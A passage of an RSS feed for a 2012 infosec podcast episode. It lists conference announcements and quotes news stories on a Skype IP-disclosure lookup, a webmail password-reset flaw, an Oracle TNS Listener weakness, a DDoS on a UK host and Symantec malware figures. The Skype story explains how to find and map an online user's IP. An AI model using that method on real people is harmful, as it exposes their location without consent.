<p>		<b id="internal-source-marker_0.7849866570904851"><br />
		</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Inside and Out of the Social-Engineer Toolkit (SET)<br />
			</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">When: July 21 &#8211; 22, 2012<br />
			When: July 23 &#8211; 24, 2012<br />
			Where: Black Hat Vegas<br />
			</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></div>
<p>		<b id="internal-source-marker_0.7849866570904851"><br />
		</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br />
			</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">When: &nbsp;September 27-30, 2012<br />
			Where: Louisville, KY<br />
			</span><a href="http://www.derbycon.com/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://www.derbycon.com</span></a></b></div>
<p>		<b id="internal-source-marker_0.7849866570904851"><br />
		</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Skydogcon<br />
			</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">When: October 26-28<br />
			Where: Hotel Preston in Nashville, TN <br />
			</span><a href="http://www.skydogcon.com/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://www.skydogcon.com</span></a></b></div>
<p>		<b id="internal-source-marker_0.7849866570904851"><br />
		</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Please consider making your &nbsp;Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">or simply use our QR Code Links.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Amazon:</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Amazon UK:</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></div>
<p>		<b id="internal-source-marker_0.7849866570904851"><br />
		</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; text-decoration: underline; vertical-align: baseline; ">Stories</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Source: </span>&nbsp;<a href="http://www.ghacks.net/2012/04/29/skype-revealing-remote-and-local-ip-address"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://www.ghacks.net/2012/04/29/skype-revealing-remote-and-local-ip-address</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">If you are a user of the messaging software Skype, you know that you can see the location of your contacts in the Skype interface. What you probably do not know is that there is currently a way to display a Skype user&rsquo;s remote and local IP address as well.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">A script has been uploaded to Github that offers these options. According to the page, it can be used to lookup IP addresses of online Skype accounts, and return both the remote and the local IP of that account on a website.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">This </span><a href="http://skype-open-source.blogspot.de/2012/04/skype-user-ip-address-disclosure.html"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">blog post</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; "> reveals how the script works. It basically starts an add a Skype contact request but does not complete it. The log file will display the local and remote IP of that Skype user, even if the user is not added to the list of contacts in Skype.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">The script is for instance available </span><a href="http://skype-ip-finder.tk/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">on this</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; "> site. Just enter the user name of a Skype user, fill out the captcha, and click the search button to initiate the lookup. You will receive the user&rsquo;s remote IP and port, as well as the local IP and port.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">This works only if the Skype user is online at the time of the lookup, and not if the user is offline. The IP address can reveal the user&rsquo;s country of origin, and maybe even the town or district. This can be done with the help of tools such as </span><a href="http://www.whatismyip.com/tools/ip-whois-lookup.asp"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">this one</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">. Just enter a public IP address in the form, and you will receive information about the provider of the IP address.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">You can also use a tool like </span><a href="http://en.iponmap.com/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">IP on Map</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; "> to display the real world location of an IP address on a map.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Source: </span>&nbsp;<a href="http://thehackernews.com/2012/04/yet-another-hotmail-aol-and-yahoo.html"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://thehackernews.com/2012/04/yet-another-hotmail-aol-and-yahoo.html</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">We Reported a 0-Day Vulnerability in Hotmail, which allowed hackers to reset account passwords and lock out the account&#39;s real owners. </span><a href="http://www.google.com/cse?cx=017931741230951650006:pksj3nwgyw4&amp;q=Tamper%20Data&amp;oq=Tamper%20Data&amp;aq=f&amp;aqi=&amp;aql=&amp;gs_nf=1&amp;gs_l=partner.3...43061.43061.3.43247.0.0.0.0.0.0.0.0..0.0.gsnos%2Cn%3D13.&amp;gs_204=1#gsc.tab=0&amp;gsc.q=Tamper%20Data&amp;gsc.page=1"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">Tamper Data</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; "> add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data. &nbsp;When they hit a password reset on a given email account they could fiddle the requests and input in a reset they chose.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Microsoft spokesperson confirmed the existence of the </span><a href="http://www.google.com/cse?cx=017931741230951650006:pksj3nwgyw4&amp;q=security%20flaw&amp;oq=security%20flaw&amp;aq=f&amp;aqi=&amp;aql=&amp;gs_nf=1&amp;gs_l=partner.3...1365722.1366141.1.1366240.0.0.0.0.0.0.0.0..0.0.gsnos%2Cn%3D13.&amp;gs_204=1#gsc.tab=0&amp;gsc.q=security%20flaw&amp;gsc.page=1"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">security flaw</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; "> and the fix, but offered no further details: &ldquo;On Friday, we addressed an incident with password reset functionality; there is no action for customers, as they are protected.&rdquo;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Later Today another unknown hacker reported another similar vulnerabilities in Hotmail, Yahoo and AOL. Using same Tamper Data add-on attacker is able to Reset passwords of any account remotely. This is somewhat a critical </span><a href="http://www.google.com/cse?cx=017931741230951650006:pksj3nwgyw4&amp;q=Vulnerability&amp;oq=Vulnerability&amp;aq=f&amp;aqi=&amp;aql=&amp;gs_nf=1&amp;gs_l=partner.3...36649.36649.2.36875.0.0.0.0.0.0.0.0..0.0.gsnos%2Cn%3D13.&amp;gs_204=1#gsc.tab=0&amp;gsc.q=Vulnerability&amp;gsc.page=1"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">Vulnerability</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; "> ever exposed, Millions of users can effected in result.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Source: &nbsp;</span><a href="https://www.computerworld.com/s/article/9226674/Researcher_misinterprets_Oracle_advisory_discloses_unpatched_database_vulnerability"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">https://www.computerworld.com/s/article/9226674/Researcher_misinterprets_Oracle_advisory_discloses_unpatched_database_vulnerability</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Instructions on how to exploit an unpatched Oracle Database Server vulnerability in order to intercept the information exchanged between clients and databases were published by a security researcher who erroneously thought that the company had patched the flaw.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Oracle&#39;s </span><a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">April 2012 Critical Patch Update (CPU) advisory</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">, published on April 17, credited security researcher Joxean Koret for a vulnerability he reported through cyberintelligence firm iSIGHT Partners.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">In </span><a href="http://seclists.org/fulldisclosure/2012/Apr/204"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">an email</span></a><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; "> sent to the Full Disclosure mailing list on April 18, Koret revealed that the vulnerability is located in the Oracle TNS Listener, a component that routes connections from clients to Oracle database servers depending on which database they are trying to reach.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">TNS Listener has a default feature, introduced in 1999, that allows clients to register a database service or database instance remotely without authentication, Koret said.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">The client sends a remote registration request to the TNS Listener and defines a new service name, its IP address, the database instances under it, and other settings. The TNS Listener then starts routing all client requests that include that service name or database instance.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">However, TNS Listener also allows the remote registration of a database instance or service name that is already registered, Koret said. &quot;The TNS listener will consider this newer registered instance name a cluster instance (Oracle RAC, Real Application Clusters) or a fail over instance (Oracle Fail over),&quot; he said.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Source: </span>&nbsp;<a href="http://www.theregister.co.uk/2012/04/26/uk2net_outage_in_ddos_attack"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://www.theregister.co.uk/2012/04/26/uk2net_outage_in_ddos_attack</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">British web hosting outfit UK2.NET was on the business end of a distributed denial-of-service attack last night that took down customers&#39; websites.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">The company&#39;s chief operating officer, Martin Baker, told The Register that UK2 had never seen a DDOS attack on this scale before.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">&quot;There was a botnet attack last night on our DNS servers. It was intermittent for people so they might see some sites up or down depending on when they&#39;re making the requests for pages,&quot; he explained. &quot;We saw around 10 million apparently unique IPs attack us.&quot;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">UK2 saw the peak of the attack at around midnight although customers first started seeing problems with their websites yesterday afternoon.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">&quot;We took various actions to trace this back to the IP addresses that they were attacking from so once we identified that we were able to put in mitigating activities to reduce it down and managed to get it off our network by about 3am,&quot; Baker said.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">&quot;The scale [of the attack] just took us longer than usual to mitigate,&quot; he added.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">This isn&#39;t the first time UK2 has fended off a DDoS attack as the company is seen as a prospective target due to its size, Baker said. He added that customer websites might still be having problems today, but it should all be cleared up by late tonight.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">&quot;The way that DNS works is that it&#39;s cached elsewhere across the internet so it will take the time that it takes those servers to get refreshed by the internet [to totally clear up], so it could take up to 24 hours for it to refresh all the way through,&quot; he said.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Punters had, of course, taken to Twitter to express their outrage as their websites fell off the net, although not in large numbers. Some complained that UK2&#39;s service status page wasn&#39;t kept up to date.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Source: </span>&nbsp;<a href="http://blogs.wsj.com/tech-europe/2012/04/30/religious-sites-are-worst-for-malware-report-finds"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; ">http://blogs.wsj.com/tech-europe/2012/04/30/religious-sites-are-worst-for-malware-report-finds</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">The most harmful websites in terms of risk from malware infection aren&rsquo;t, as you might imagine, pornography, but rather religious sites, according to Symantec&rsquo;s Internet Security Threat Report.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">The average number of threats found on religious sites was 115 (mostly fake antivirus software). By contrast, pornographic sites had less than a quarter, at around 25 threats per site. Of course, the number of pornographic sites is vastly greater than religious sites.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">According to Greg Day, Symantec&rsquo;s security CTO for Europe, the Middle East and Africa, while trojans may seem more serious, &ldquo;if you have installed fake AV you may think you are protected, when in reality you are open to all sorts of attacks.&rdquo;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Reports about malware infection produced by companies that sell anti-malware software are always going to have an inherent conflict of interest. That said, Symantec&rsquo;s report, the 17th, has established itself as authoritative within the industry.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Otherwise, the report confirms mostly what we already know:</span></b></div>
<ul style="margin-top: 0pt; margin-bottom: 0pt; ">
<li style="list-style-type: disc; font-size: 15px; font-weight: normal; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">The threat to mobile devices, almost exclusively on Android, continues to grow, although tiny compared to the PC threat. There are 403 million PC threats, and about 4,000 on mobile.</span></b></div>
</li>
<li style="list-style-type: disc; font-size: 15px; font-weight: normal; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Targeted attacks are no longer limited to large organizations. Some 50% of such attacks target organizations with fewer than 2,500 employees, and almost 18% target companies with fewer than 250 employees.</span></b></div>
</li>
<li style="list-style-type: disc; font-size: 15px; font-weight: normal; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">Spam is down, largely due to the closure of a Russian spam network, by 20%. However, malware attacks via social networks are up.</span></b></div>
</li>
<li style="list-style-type: disc; font-size: 15px; font-weight: normal; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; vertical-align: baseline; ">The threat overall has continued to grow hugely, mainly due to the commoditization of malware. There was an 81% increase in malicious attacks compared with a year earlier. The number of unique malware variants increased to 403 million.</span></b></div>
</li>
</ul>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">Mr. Day drew attention to the increased threat to small and medium enterprises from persistent attacks. &ldquo;When Stuxnet was uncovered in 2010 we saw about three targeted attacks that year. We are now seeing on average 94 a day, and in December 2011 that figure was 154 a day,&rdquo; he said.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">He said there was a misconception that it is senior executives who were targeted. &ldquo;We are seeing a lot more attacks against people in sales, or HR.&rdquo; Likewise, the purpose of the attacks is changing. &ldquo;They could be going for IP, customer contacts, prices and future plans. It is easier to steal than to innovate.&rdquo;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.7849866570904851"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; ">[end]</span></b></div>
</p></div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-656-skype-ip-revealer-another-0-day-oracle-disclosure-uk2-and-religious-malware/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3858/0/infosec-daily-podcast-episode-656.mp3" length="65160759" type="audio/mpeg" />
		<itunes:duration>0:45:14</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 656 for April 30, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods and Karthik Rangarajan.


		
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
			When: [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 656 for April 30, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods and Karthik Rangarajan.


		
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
			When: &#160;May 19, 2012
			Where: &#160;Veasey Memorial Park, Groveland, MA
			http://granitesec4.eventbrite.com
		
		
AIDE 2012
			When: May 21-25, 2012
			Where: MU Forensic Science Center &#160;- Huntington, West Virginia
			http://www.appyide.org/
		
		
LayerOne 2012
			When: May 26-27, 2012
			Where: Clarion Hotel &#8211; Anaheim, CA
			http://www.layerone.org
		
		
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
			When: June 20 &#8211; 27, 2012
			Where: Courtyard Seattle Federal Way, WA 
			http://www.sans.org/mentor/details.php?nid=28014
		
		
Social Engineering Training
When: July 21-24, 2012
			Where: Black Hat Vegas
When: August 20-24, 2012
			Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
			Where: &#160;Columbia, MD
			http://www.social-engineer.com/social-engineer-training
		
		
Inside and Out of the Social-Engineer Toolkit (SET)
			When: July 21 &#8211; 22, 2012
			When: July 23 &#8211; 24, 2012
			Where: Black Hat Vegas
			http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
		
		
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
			When: &#160;September 27-30, 2012
			Where: Louisville, KY
			http://www.derbycon.com
		
		
Skydogcon
			When: October 26-28
			Where: Hotel Preston in Nashville, TN 
			http://www.skydogcon.com
		
		
Please consider making your &#160;Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
or simply use our QR Code Links.
Amazon:
Amazon UK:
You don't have a sufficient version of Flash Player to display this animation.
		
		
Stories
Source: &#160;http://www.ghacks.net/2012/04/29/skype-revealing-remote-and-local-ip-address
If you are a user of the messaging software Skype, you know that you can see the location of your contacts in the Skype interface. What you probably do not know is that there is currently a way to display a Skype user&#8217;s remote and local IP address as well.
A script has been uploaded to Github that offers these options. According to the page, it can be used to lookup IP addresses of online Skype accounts, and return both the remote and the local IP of that account on a website.
This blog post reveals how the script works. It basically starts an add a Skype contact request but does not complete it. The log file will display the local and remote IP of that Skype user, even if the user is not added to the list of contacts in Skype.
The script is for instance available on this site. Just enter the user name of a Skype user, fill out the captcha, and click the search button to initiate the lookup. You will receive the user&#8217;s remote IP and port, as well as the local IP and port.
This works only if the Skype user is online at the time of the lookup, and not if the user is offline. The IP address can reveal the user&#8217;s country of origin, and maybe even the town or district. This can be done with the help of tools such as this one. Just enter a public IP address in the form, and you will receive information about the provider of the IP address.
You can also use a tool like IP on Map to display the real world location of an IP address on a map.
&#8230;.
Source: &#160;http://thehackernews.com/2012/04/yet-another-hotmail-aol-and-yahoo.html
We Reported a 0-Day Vulnerability in Hotmail, which allowed hackers to reset account passwords and lock out the account&#39;s real owners. Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data. &#160;When they hit a password reset on a given email account they could fiddle the requests and input in a [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 655 &#8211; DerbyCon Sales Kick-Off, HTML5 Bots, Spam on the Run, Oh, We fixed that, Philippine Attacks, Warrants?  Please No.</title>
		<link>http://www.isdpodcast.com/episode-655-derbycon-sales-kick-off-html5-bots-spam-on-the-run-oh-we-fixed-that-philippine-attacks-warrants-please-no</link>
		<comments>http://www.isdpodcast.com/episode-655-derbycon-sales-kick-off-html5-bots-spam-on-the-run-oh-we-fixed-that-philippine-attacks-warrants-please-no#comments</comments>
		<pubDate>Fri, 27 Apr 2012 18:54:28 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3851</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 655 for April 27, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, and Karthik Rangarajan. Special Guests: Erin Kennedy, and Nick &#160; &#160; Announcements Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 When: [...]]]></description>
